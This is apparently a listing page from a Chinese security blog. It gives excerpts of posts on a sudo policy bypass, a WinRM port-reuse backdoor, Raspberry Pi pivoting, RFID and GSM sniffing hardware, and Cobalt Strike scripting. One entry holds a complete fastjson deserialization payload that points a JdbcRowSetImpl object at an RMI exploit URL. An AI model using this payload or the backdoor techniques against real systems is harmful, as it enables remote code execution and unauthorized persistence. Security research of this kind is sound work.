2020-08-10 13:40:44    435    0    0
## 0x01. 说明 管理员可以配置 sudoers 文件,来定义哪些用户可以运行哪些命令。即便限制了用户以 root 身份运行特定或任何命令,该漏洞也可允许用户绕过此安全策略,并完全控制系统。比较鸡肋,可以留后门的方式存在其中比较猥琐。 ## 0x02. 影响范围: sudo 1.8.28 **以前的所有版本!** 我这里复现的测试成功的版本如下,其余没有测。 CentOS7: sudo
2020-08-10 13:40:21    421    0    0
## 0x1.安装与烧录 下载地址:https://www.arduino.cc/en/Main/Software 下面演示的是MAC版本: 插入USB让电脑读取到在工具里选择USB接口 ![-w831](http://mweb.03sec.com/15705317212020.jpg) 选择程序的开发板有很多种开发板看你的板是什么 ![-w567](http://mweb.03sec.com/1
2020-08-10 13:40:05    421    0    0
## 0x00. 前言 本次操作的是如何通过多个网卡转发内网到外网出口,然外网的兄弟快速介入内网进行渗透测试 下图是树莓派的基本架构, ![-w444](http://mweb.03sec.com/15693960586191.jpg) 风扇的安装方法如下,按照图示接入,否则风扇不会转动。 ![-w487](http://mweb.03sec.com/15693968067785.jpg) 下
2020-08-10 13:39:36    577    0    0
## 0x00. Proxmark3简单介绍 #### 什么是 RFID? RFID是Radio Frequency Identification的缩写,术语为射频识别,俗称电子标签。按照工作频率的不同,RFID标签可以分为低频(LF)、高频(HF)、超高频(UHF)和微波等不同种类。目前国际上广泛采用的频率分布于4种波段,低频(125KHz)、高频(13.54MHz)、超高频(850MHz~91
2020-08-10 13:38:56    438    0    0
### 0x0. 基本原理介绍 该后门的基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。这句话是抄的。话不多网上有详细介绍。在用本后门的情况下是必须拿下服务器,用来维持一段时间的权限,要想一直不被发现请移步rootkit! ### 0x1. 后门配置方法 首先查看系统有没有启动该服务,如没有启动请启动,没有启动的
2020-08-10 13:38:30    376    0    0
poc ``` {"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}} ```
2020-08-10 13:38:13    399    0    0
##什么是AggressorScripts Aggressor Script是Cobalt Strike 3.0版及更高版本中内置的脚本语言。Aggresor Script允许您修改和扩展Cobalt Strike客户端 Aggressor Script是一种脚本语言,用于红方操作和可编写脚本的IRC客户端和机器人启发的对手模拟。它的目的是双重的。您可以创建长时间运行的机器人模拟虚拟红色团队成员,
2020-08-10 13:37:53    388    0    0
##0x0 前言 反爬虫和爬虫之间的较量已经争斗多年,不管是攻还是守,已经持续N年,这是一个没有硝烟的战场,大家都知道爬虫和反爬之家的道高一尺魔高一丈的关系。但这个方案可以很大程度上可以增加普通爬虫的采集成本,在不使用OCR的前提下,算是比较极致的方案了。当然方案有很多种,层出不穷的各种方法,这里介绍的时候反爬虫的中的一种比较实用的方案,字体反爬也就是自定义字体反爬通过调用自定义的ttf文件
2020-08-10 13:37:31    383    0    0
![0](https://raw.githubusercontent.com/hackxx/javaweb-codereview/master/media/15460052300727/0.png) @Author [安百科技](http://www.anbai.com)-[凌天实验室](http://www.absec.cn)-[园长](http://javaweb.org)[连长](http
2020-08-10 13:34:37    381    0    0
------- ##0x0 前言 嗅探装置价格低廉,很容易买到,一般几百块钱就可以配一套。一般使用摩托罗拉C118手机主板、天线、串口模块改装成嗅探设备。现在虽然大家都用4G的LTE网络了但是还有大量的2G的GSM网络存在,现在的GSM网络主要是中国移动的用户,中国电信没有GSM网络,中国联通在清退GSM网络,中国移动先清退的是3G 的TD网络而不是2G的GSM网络。GSM网络有一个很大的缺陷就